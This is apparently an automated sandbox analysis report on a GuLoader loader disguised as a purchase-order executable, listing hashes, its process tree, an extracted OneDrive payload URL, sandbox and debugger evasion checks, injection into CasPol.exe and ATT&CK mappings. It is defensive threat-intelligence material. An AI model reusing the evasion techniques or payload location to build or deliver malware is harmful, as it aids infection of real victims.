Windows Analysis Report Purchase Order PO20211027STK.exe

Overview

General Information

Sample Name: Purchase Order PO20211027STK.exe
Analysis ID: 531732
MD5: 2f2102ec5776497950e89e419515efee
SHA1: 1d3dd4ed88af22c3de29c918b37db6f0b73c94c4
SHA256: 7768da29cc4ef93cb4790f664e139d1d8c2972e22fe8840b6b86c50e15dba347
Tags: exe, guloader

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Abnormal high CPU Usage
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • Purchase Order PO20211027STK.exe (PID: 7088 cmdline: "C:\Users\user\Desktop\Purchase Order PO20211027STK.exe" MD5: 2F2102EC5776497950E89E419515EFEE)
    • SPORENE.exe (PID: 7152 cmdline: C:\Users\user\AppData\Local\Temp\SPORENE.exe MD5: 582A642DF36CDAC38982E4842F370B44)
      • CasPol.exe (PID: 6848 cmdline: C:\Users\user\AppData\Local\Temp\SPORENE.exe MD5: F866FC1C2E928779C7119353C3091F0C)
        • conhost.exe (PID: 6836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://onedrive.live.com/download?cid=5A15FDA1AE98540B&r"}

Yara Overview

Memory Dumps

| Source | Rule | Description | Author | Strings |
| --- | --- | --- | --- | --- |
| 0000000A.00000000.509732142.0000000001300000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security | |
| 0000000A.00000002.626110069.0000000001300000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security | |

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 0000000A.00000000.509732142.0000000001300000.00000040.00000001.sdmp | Malware Configuration Extractor: GuLoader {"Payload URL": "https://onedrive.live.com/download?cid=5A15FDA1AE98540B&r"}
Multi AV Scanner detection for submitted file
Source: Purchase Order PO20211027STK.exe | ReversingLabs: Detection: 11%
Machine Learning detection for sample
Source: Purchase Order PO20211027STK.exe | Joe Sandbox ML: detected
Source: Purchase Order PO20211027STK.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Purchase Order PO20211027STK.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\SPORENE.pdb source: Purchase Order PO20211027STK.exe, 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp, Purchase Order PO20211027STK.exe, 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp, SPORENE.exe.0.dr
Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe | Code function: 0_2_00406873 FindFirstFileW, FindClose
Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe | Code function: 0_2_00405C49 GetTempPathW, DeleteFileW, lstrcatW, lstrcatW, lstrlenW, FindFirstFileW, FindNextFileW, FindClose
Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe | Code function: 0_2_0040290B FindFirstFileW

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: https://onedrive.live.com/download?cid=5A15FDA1AE98540B&r
Source: Purchase Order PO20211027STK.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Purchase Order PO20211027STK.exe, 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp, Purchase Order PO20211027STK.exe, 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp, SPORENE.exe.0.dr | String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: Purchase Order PO20211027STK.exe, 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp, Purchase Order PO20211027STK.exe, 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp, SPORENE.exe.0.dr | String found in binary or memory: http://s.symcd.com06
Source: Purchase Order PO20211027STK.exe, 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp, Purchase Order PO20211027STK.exe, 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp, SPORENE.exe.0.dr | String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: Purchase Order PO20211027STK.exe, 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp, Purchase Order PO20211027STK.exe, 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp, SPORENE.exe.0.dr | String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: Purchase Order PO20211027STK.exe, 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp, Purchase Order PO20211027STK.exe, 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp, SPORENE.exe.0.dr | String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Purchase Order PO20211027STK.exe, 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp, Purchase Order PO20211027STK.exe, 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp, SPORENE.exe.0.dr | String found in binary or memory: https://d.symcb.com/cps0%
Source: Purchase Order PO20211027STK.exe, 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp, Purchase Order PO20211027STK.exe, 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp, SPORENE.exe.0.dr | String found in binary or memory: https://d.symcb.com/rpa0
Source: Purchase Order PO20211027STK.exe, 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp, Purchase Order PO20211027STK.exe, 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp, SPORENE.exe.0.dr | String found in binary or memory: https://d.symcb.com/rpa0.
Source: unknown | DNS traffic detected: queries for: onedrive.live.com
Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe | Code function: 0_2_004056DE GetDlgItem, GetDlgItem, GetDlgItem, GetDlgItem, GetClientRect, GetSystemMetrics, SendMessageW, SendMessageW, SendMessageW, SendMessageW, SendMessageW, SendMessageW, ShowWindow, ShowWindow, GetDlgItem, SendMessageW, SendMessageW, SendMessageW, GetDlgItem, CreateThread, CloseHandle, ShowWindow, ShowWindow, ShowWindow, ShowWindow, SendMessageW, CreatePopupMenu, AppendMenuW, GetWindowRect, TrackPopupMenu, SendMessageW, OpenClipboard, EmptyClipboard, GlobalAlloc, GlobalLock, SendMessageW, GlobalUnlock, SetClipboardData, CloseClipboard

System Summary:

Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: Purchase Order PO20211027STK.exe
Executable has a suspicious name (potential lure to open the executable)
Source: Purchase Order PO20211027STK.exe | Static file information: Suspicious name
Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe | Code function: 0_2_0040352D EntryPoint, SetErrorMode, GetVersionExW, GetVersionExW, GetVersionExW, lstrlenA, #17, OleInitialize, SHGetFileInfoW, GetCommandLineW, CharNextW, GetTempPathW, GetTempPathW, GetWindowsDirectoryW, lstrcatW, GetTempPathW, lstrcatW, SetEnvironmentVariableW, SetEnvironmentVariableW, SetEnvironmentVariableW, DeleteFileW, lstrcatW, lstrcatW, lstrcatW, lstrcmpiW, SetCurrentDirectoryW, DeleteFileW, CopyFileW, CloseHandle, ExitProcess, OleUninitialize, ExitProcess, GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, ExitWindowsEx, ExitProcess
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 10_2_0130C57E NtAllocateVirtualMemory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 10_2_01313445 NtProtectVirtualMemory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process Stats: CPU usage > 98%
Source: C:\Users\user\AppData\Local\Temp\SPORENE.exe | Process Stats: CPU usage > 98%
Source: Purchase Order PO20211027STK.exe, 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp | Binary or memory string: OriginalFilename SPORENE.exe vs Purchase Order PO20211027STK.exe
Source: Purchase Order PO20211027STK.exe, 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp | Binary or memory string: OriginalFilename SPORENE.exe vs Purchase Order PO20211027STK.exe
Source: SPORENE.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe | File read: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe
Source: Purchase Order PO20211027STK.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\SPORENE.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: unknown | Process created: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe "C:\Users\user\Desktop\Purchase Order PO20211027STK.exe"
Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe | Process created: C:\Users\user\AppData\Local\Temp\SPORENE.exe C:\Users\user\AppData\Local\Temp\SPORENE.exe
Source: C:\Users\user\AppData\Local\Temp\SPORENE.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\SPORENE.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe | File created: C:\Users\user\AppData\Local\Temp\nsdBD47.tmp
Source: classification engine | Classification label: mal100.troj.evad.winEXE@6/1@2/0
Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe | Code function: 0_2_004021AA CoCreateInstance
Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe | Code function: 0_2_0040498A GetDlgItem, SetWindowTextW, SHBrowseForFolderW, CoTaskMemFree, lstrcmpiW, lstrcatW, SetDlgItemTextW, GetDiskFreeSpaceW, MulDiv, SetDlgItemTextW
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6836:120:WilError_01
Source: Window Recorder | Window detected: More than 3 window changes detected

Data Obfuscation:

Yara detected GuLoader
Source: Yara match | File source: 0000000A.00000000.509732142.0000000001300000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.626110069.0000000001300000.00000040.00000001.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe | File created: C:\Users\user\AppData\Local\Temp\SPORENE.exe
Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\SPORENE.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect Any.run
Source: C:\Users\user\AppData\Local\Temp\SPORENE.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\AppData\Local\Temp\SPORENE.exe | File opened: C:\Program Files\qga\qga.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: SPORENE.exe, 00000002.00000002.630328200.0000000003F20000.00000004.00000001.sdmp | Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLL
Source: SPORENE.exe, 00000002.00000002.630328200.0000000003F20000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\SPORENE.exe | System information queried: ModuleInformation
Source: SPORENE.exe, 00000002.00000002.630501912.000000000606A000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.626781810.000000000316A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Guest Shutdown Service
Source: SPORENE.exe, 00000002.00000002.630501912.000000000606A000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.626781810.000000000316A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: CasPol.exe, 0000000A.00000002.626781810.000000000316A000.00000004.00000001.sdmp | Binary or memory string: vmicshutdown
Source: SPORENE.exe, 00000002.00000002.630501912.000000000606A000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.626781810.000000000316A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: SPORENE.exe, 00000002.00000002.630328200.0000000003F20000.00000004.00000001.sdmp | Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dll
Source: SPORENE.exe, 00000002.00000002.630501912.000000000606A000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.626781810.000000000316A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V PowerShell Direct Service
Source: SPORENE.exe, 00000002.00000002.630501912.000000000606A000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.626781810.000000000316A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 0000000A.00000002.626781810.000000000316A000.00000004.00000001.sdmp | Binary or memory string: vmicvss
Source: SPORENE.exe, 00000002.00000002.630328200.0000000003F20000.00000004.00000001.sdmp | Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: SPORENE.exe, 00000002.00000002.630501912.000000000606A000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.626781810.000000000316A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Data Exchange Service
Source: SPORENE.exe, 00000002.00000002.630501912.000000000606A000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.626781810.000000000316A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Heartbeat Service
Source: SPORENE.exe, 00000002.00000002.630501912.000000000606A000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.626781810.000000000316A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Guest Service Interface
Source: CasPol.exe, 0000000A.00000002.626781810.000000000316A000.00000004.00000001.sdmp | Binary or memory string: vmicheartbeat

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\AppData\Local\Temp\SPORENE.exe | Thread information set: HideFromDebugger
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread information set: HideFromDebugger
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 10_2_0130FD16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 10_2_013121A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 10_2_01310ABF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 10_2_01305BFC LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 10_2_01313A78 RtlAddVectoredExceptionHandler

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\SPORENE.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 1300000
Source: SPORENE.exe, 00000002.00000002.628178990.0000000002080000.00000002.00020000.sdmp, CasPol.exe, 0000000A.00000002.626654609.0000000001D10000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: SPORENE.exe, 00000002.00000002.628178990.0000000002080000.00000002.00020000.sdmp, CasPol.exe, 0000000A.00000002.626654609.0000000001D10000.00000002.00020000.sdmp | Binary or memory string: Progman
Source: SPORENE.exe, 00000002.00000002.628178990.0000000002080000.00000002.00020000.sdmp, CasPol.exe, 0000000A.00000002.626654609.0000000001D10000.00000002.00020000.sdmp | Binary or memory string: &Program Manager
Source: SPORENE.exe, 00000002.00000002.628178990.0000000002080000.00000002.00020000.sdmp, CasPol.exe, 0000000A.00000002.626654609.0000000001D10000.00000002.00020000.sdmp | Binary or memory string: Progmanlock

Stealing of Sensitive Information:

GuLoader behavior detected
Source: Initial file | Signature Results: GuLoader behavior

Mitre Att&ck Matrix

| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Valid Accounts | Windows Management Instrumentation | Path Interception | Access Token Manipulation 1 | Virtualization/Sandbox Evasion 2 | OS Credential Dumping | Security Software Discovery 31 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1 |
| Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Process Injection 112 | Access Token Manipulation 1 | LSASS Memory | Virtualization/Sandbox Evasion 2 | Remote Desktop Protocol | Clipboard Data 1 | Exfiltration Over Bluetooth | Non-Application Layer Protocol 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 112 | Security Account Manager | Process Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol 11 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 1 | NTDS | File and Directory Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud |
| Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | System Information Discovery 4 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |

      Behavior Graph

      Behavior Graph ID: 531732, Sample: Purchase Order PO20211027STK.exe, Startdate: 01/12/2021, Architecture: WINDOWS, Score: 100
      Domains: onedrive.live.com, ervtqq.bl.files.1drv.com, bl-files.fe.1drv.com
      Signatures: Found malware configuration; Multi AV Scanner detection for submitted file; GuLoader behavior detected; 6 other signatures
      • Purchase Order PO20211027STK.exe (started)
        dropped: C:\Users\user\AppData\Local\...\SPORENE.exe, PE32
        • SPORENE.exe (started)
          signatures: Writes to foreign memory regions; Tries to detect Any.run; Hides threads from debuggers
          • CasPol.exe (started)
            signatures: Tries to detect Any.run; Hides threads from debuggers
            • conhost.exe (started)

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      Source | Detection | Scanner | Label | Link
      Purchase Order PO20211027STK.exe | 11% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
      Purchase Order PO20211027STK.exe | 100% | Joe Sandbox ML | |

      Dropped Files

      Source | Detection | Scanner | Label | Link
      C:\Users\user\AppData\Local\Temp\SPORENE.exe | 9% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      No Antivirus matches

      Domains and IPs

      Contacted Domains

      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      onedrive.live.com | unknown | unknown | false | | high
      ervtqq.bl.files.1drv.com | unknown | unknown | false | | high

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          https://onedrive.live.com/download?cid=5A15FDA1AE98540B&r | false | | high

            URLs from Memory and Binaries

            Name | Source | Malicious | Antivirus Detection | Reputation
            http://nsis.sf.net/NSIS_ErrorError | Purchase Order PO20211027STK.exe | false | | high

              Contacted IPs

              No contacted IP infos

              General Information

              Joe Sandbox Version:34.0.0 Boulder Opal
              Analysis ID:531732
              Start date:01.12.2021
              Start time:09:57:30
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 6m 56s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:Purchase Order PO20211027STK.exe
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:18
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@6/1@2/0
              EGA Information:Failed
              HDC Information:
              • Successful, ratio: 100% (good quality ratio 97.1%)
              • Quality average: 83.8%
              • Quality standard deviation: 24.5%
              HCA Information:Failed
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found application associated with file extension: .exe
              Warnings:
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
              • Excluded IPs from analysis (whitelisted): 13.107.43.13, 13.107.43.12
              • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, client.wns.windows.com, fs.microsoft.com, odc-web-geo.onedrive.akadns.net, bl-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, l-0003.dc-msedge.net, ctldl.windowsupdate.com, arc.msn.com, l-0004.dc-msedge.net, ris.api.iris.microsoft.com, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, odc-bl-files-brs.onedrive.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, odc-bl-files-geo.onedrive.akadns.net
              • Not all processes where analyzed, report is missing behavior information

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASN

              No context

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\Local\Temp\SPORENE.exe
              Process:C:\Users\user\Desktop\Purchase Order PO20211027STK.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):21321008
              Entropy (8bit):0.09325738133607682
              Encrypted:false
              SSDEEP:3072:mIXeoCC869BrI49jK9oUhJSSjfv8XEHPO:madlYoUZf2EvO
              MD5:582A642DF36CDAC38982E4842F370B44
              SHA1:3DD6D0CECD4CD9414D7DF148F7C46548C5709D62
              SHA-256:361DEDDF3E436753730DBB20842FBD6D1EF2EC27C56CD9DA99E87751C3BBE890
              SHA-512:E9C94417ACEF2B33DED79182C8B397E2693A74D290E78E286AE7576C998BF14F39F370C06BC40C9DFFDF2DE2E7F680AA0F33D74DB508E15EEAF1D31BE8D06BB6
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 9%
              Reputation:low
              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........,..SM.SM.SM..Q..RM..o.UM.ek.RM.RichSM.................PE..L.....5Y.....................0C.....$.............@..........................@E.....,qE.........................................(.... ....C.........P@E.....................................................0... ....................................text............................... ..`.data...p...........................@....rsrc.....C.. ... C.. ..............@..@...I............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
              Entropy (8bit):7.060974988277113
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:Purchase Order PO20211027STK.exe
              File size:131031
              MD5:2f2102ec5776497950e89e419515efee
              SHA1:1d3dd4ed88af22c3de29c918b37db6f0b73c94c4
              SHA256:7768da29cc4ef93cb4790f664e139d1d8c2972e22fe8840b6b86c50e15dba347
              SHA512:963b79cb63703ea6a6e8d70bbe76fadc660e10b801283a3812a76f773ee36210171437794dad0b4ee11e8a2f34645c88c7463526be03274ffdf48ec81823032a
              SSDEEP:3072:gbG7N2kDTHUpou4ubV4QviYqsYLQyI9xxsFIRO7c3fkA:gbE/HUjV4QviYJMQXyFIR2HA
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........

              File Icon

              Icon Hash:b2a88c96b2ca6a72

              Static PE Info

              General

              Entrypoint:0x40352d
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Time Stamp:0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6

              Entrypoint Preview

              Instruction
              push ebp
              mov ebp, esp
              sub esp, 000003F4h
              push ebx
              push esi
              push edi
              push 00000020h
              pop edi
              xor ebx, ebx
              push 00008001h
              mov dword ptr [ebp-14h], ebx
              mov dword ptr [ebp-04h], 0040A2E0h
              mov dword ptr [ebp-10h], ebx
              call dword ptr [004080CCh]
              mov esi, dword ptr [004080D0h]
              lea eax, dword ptr [ebp-00000140h]
              push eax
              mov dword ptr [ebp-0000012Ch], ebx
              mov dword ptr [ebp-2Ch], ebx
              mov dword ptr [ebp-28h], ebx
              mov dword ptr [ebp-00000140h], 0000011Ch
              call esi
              test eax, eax
              jne 00007FEEC0975E6Ah
              lea eax, dword ptr [ebp-00000140h]
              mov dword ptr [ebp-00000140h], 00000114h
              push eax
              call esi
              mov ax, word ptr [ebp-0000012Ch]
              mov ecx, dword ptr [ebp-00000112h]
              sub ax, 00000053h
              add ecx, FFFFFFD0h
              neg ax
              sbb eax, eax
              mov byte ptr [ebp-26h], 00000004h
              not eax
              and eax, ecx
              mov word ptr [ebp-2Ch], ax
              cmp dword ptr [ebp-0000013Ch], 0Ah
              jnc 00007FEEC0975E3Ah
              and word ptr [ebp-00000132h], 0000h
              mov eax, dword ptr [ebp-00000134h]
              movzx ecx, byte ptr [ebp-00000138h]
              mov dword ptr [00434FB8h], eax
              xor eax, eax
              mov ah, byte ptr [ebp-0000013Ch]
              movzx eax, ax
              or eax, ecx
              xor ecx, ecx
              mov ch, byte ptr [ebp-2Ch]
              movzx ecx, cx
              shl eax, 10h
              or eax, ecx

              Rich Headers

              Programming Language:
              • [EXP] VC++ 6.0 SP5 build 8804

              Data Directories

              Name | Virtual Address | Virtual Size | Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8610 | 0xa0 | .rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4c000 | 0x11e0 | .rsrc
